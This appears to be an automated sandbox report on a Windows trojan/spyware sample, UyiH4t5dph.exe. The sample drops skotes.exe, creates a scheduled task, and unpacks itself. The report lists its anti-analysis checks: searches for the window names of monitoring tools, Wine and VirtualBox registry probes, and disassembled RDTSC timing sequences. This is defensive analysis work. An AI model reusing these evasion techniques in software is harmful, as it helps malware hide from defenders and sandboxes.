Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_00318860	0_2_00318860
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_002D4DE0	0_2_002D4DE0
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_002D4B30	0_2_002D4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00C278BB	2_2_00C278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00C27049	2_2_00C27049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00C28860	2_2_00C28860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00C231A8	2_2_00C231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00BE4B30	2_2_00BE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00BE4DE0	2_2_00BE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00C22D10	2_2_00C22D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00C2779B	2_2_00C2779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00C17F36	2_2_00C17F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C06192	6_2_00C06192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00BEE530	6_2_00BEE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C28860	6_2_00C28860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00BE4B30	6_2_00BE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C96D9A	6_2_00C96D9A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00BE4DE0	6_2_00BE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C22D10	6_2_00C22D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C00E13	6_2_00C00E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C27049	6_2_00C27049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C231A8	6_2_00C231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C10BC7	6_2_00C10BC7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C01602	6_2_00C01602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C2779B	6_2_00C2779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C278BB	6_2_00C278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C03DF1	6_2_00C03DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C17F36	6_2_00C17F36

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00BFD942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00BFD663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00BFD64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00BF80C0 appears 261 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00C18E10 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00BFDF80 appears 62 times
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: String function: 002E80C0 appears 130 times

Source: UyiH4t5dph.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: UyiH4t5dph.exe	Static PE information: Section: ZLIB complexity 0.9980947717983651
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9980947717983651

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: UyiH4t5dph.exe	Virustotal: Detection: 54%
Source: UyiH4t5dph.exe	ReversingLabs: Detection: 47%

Source: UyiH4t5dph.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

File read: C:\Users\user\Desktop\UyiH4t5dph.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UyiH4t5dph.exe "C:\Users\user\Desktop\UyiH4t5dph.exe"
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: UyiH4t5dph.exe

Static file information: File size 2990592 > 1048576

Source: UyiH4t5dph.exe

Static PE information: Raw size of ascqmpzr is bigger than: 0x100000 < 0x2a8600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Unpacked PE file: 0.2.UyiH4t5dph.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ascqmpzr:EW;vkonyklc:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: UyiH4t5dph.exe	Static PE information: real checksum: 0x2e8826 should be: 0x2dd7ed
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2e8826 should be: 0x2dd7ed

Source: UyiH4t5dph.exe	Static PE information: section name:
Source: UyiH4t5dph.exe	Static PE information: section name: .idata
Source: UyiH4t5dph.exe	Static PE information: section name: ascqmpzr
Source: UyiH4t5dph.exe	Static PE information: section name: vkonyklc
Source: UyiH4t5dph.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: ascqmpzr
Source: skotes.exe.0.dr	Static PE information: section name: vkonyklc
Source: skotes.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_002ED91C push ecx; ret	0_2_002ED92F
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_002E1359 push es; ret	0_2_002E135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00BFD91C push ecx; ret	2_2_00BFD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C30B53 push cs; ret	6_2_00C30B56
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C30B0C push cs; ret	6_2_00C30B0E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C30B14 push cs; ret	6_2_00C30B16
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C30B1D push cs; ret	6_2_00C30B1E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C30B20 push cs; ret	6_2_00C30B46
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C30B2D push cs; ret	6_2_00C30B2E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00BFD91C push ecx; ret	6_2_00BFD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00BFDFC6 push ecx; ret	6_2_00BFDFD9

Source: UyiH4t5dph.exe	Static PE information: section name: entropy: 7.980946742819636
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.980946742819636

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-11082
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_2-9654

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 33F5E4 second address: 33F5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 33F5EC second address: 33F5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FE6E8B29088h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 33F5FF second address: 33EEE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ah, D9h 0x0000000d popad 0x0000000e push dword ptr [ebp+122D0EB9h] 0x00000014 mov dword ptr [ebp+122D2334h], edx 0x0000001a jns 00007FE6E8F184BCh 0x00000020 call dword ptr [ebp+122D24F1h] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D24B3h], esi 0x0000002d xor eax, eax 0x0000002f ja 00007FE6E8F184C2h 0x00000035 jnc 00007FE6E8F184BCh 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f js 00007FE6E8F184BCh 0x00000045 mov dword ptr [ebp+122D2950h], edi 0x0000004b mov dword ptr [ebp+122D2950h], ecx 0x00000051 mov dword ptr [ebp+122D2C8Ch], eax 0x00000057 sub dword ptr [ebp+122D24B3h], ecx 0x0000005d mov esi, 0000003Ch 0x00000062 mov dword ptr [ebp+122D2A2Dh], edi 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c pushad 0x0000006d or dword ptr [ebp+122D2A2Dh], ebx 0x00000073 popad 0x00000074 lodsw 0x00000076 jmp 00007FE6E8F184C6h 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f add dword ptr [ebp+122D2A2Dh], eax 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 cld 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007FE6E8F184BCh 0x00000092 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4A9412 second address: 4A9429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnl 00007FE6E8B2908Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4B78AA second address: 4B78C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jmp 00007FE6E8F184C5h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4B7D3A second address: 4B7D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4B7D3F second address: 4B7D6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE6E8F184C9h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FE6E8F184BBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4B7D6D second address: 4B7D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4B7D71 second address: 4B7D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4BB5E7 second address: 4BB5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4BB5EB second address: 33EEE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 2D50A466h 0x0000000e mov dword ptr [ebp+122D29FFh], eax 0x00000014 push dword ptr [ebp+122D0EB9h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FE6E8F184B8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jmp 00007FE6E8F184BAh 0x00000039 call dword ptr [ebp+122D24F1h] 0x0000003f pushad 0x00000040 mov dword ptr [ebp+122D24B3h], esi 0x00000046 xor eax, eax 0x00000048 ja 00007FE6E8F184C2h 0x0000004e jnc 00007FE6E8F184BCh 0x00000054 mov edx, dword ptr [esp+28h] 0x00000058 js 00007FE6E8F184BCh 0x0000005e mov dword ptr [ebp+122D2950h], edi 0x00000064 mov dword ptr [ebp+122D2950h], ecx 0x0000006a mov dword ptr [ebp+122D2C8Ch], eax 0x00000070 sub dword ptr [ebp+122D24B3h], ecx 0x00000076 mov esi, 0000003Ch 0x0000007b mov dword ptr [ebp+122D2A2Dh], edi 0x00000081 add esi, dword ptr [esp+24h] 0x00000085 pushad 0x00000086 or dword ptr [ebp+122D2A2Dh], ebx 0x0000008c popad 0x0000008d lodsw 0x0000008f jmp 00007FE6E8F184C6h 0x00000094 add eax, dword ptr [esp+24h] 0x00000098 add dword ptr [ebp+122D2A2Dh], eax 0x0000009e mov ebx, dword ptr [esp+24h] 0x000000a2 cld 0x000000a3 push eax 0x000000a4 push eax 0x000000a5 push edx 0x000000a6 jmp 00007FE6E8F184BCh 0x000000ab rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4BB7DF second address: 4BB7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4BB7E3 second address: 4BB80D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FE6E8F184C6h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4BBA12 second address: 4BBA3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jne 00007FE6E8B29088h 0x00000012 jmp 00007FE6E8B2908Ah 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push edi 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D92A7 second address: 4D92AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D951B second address: 4D951F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
